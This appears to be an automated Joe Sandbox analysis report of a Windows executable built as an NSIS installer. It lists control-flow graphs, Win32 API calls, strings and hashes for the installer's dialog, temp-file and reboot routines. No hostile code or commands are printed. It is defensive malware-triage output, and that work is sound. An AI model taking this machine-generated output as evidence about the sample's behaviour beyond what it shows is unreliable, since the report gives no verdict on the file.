3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                                                            Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                                            Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                                            Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                                            Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                                            Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
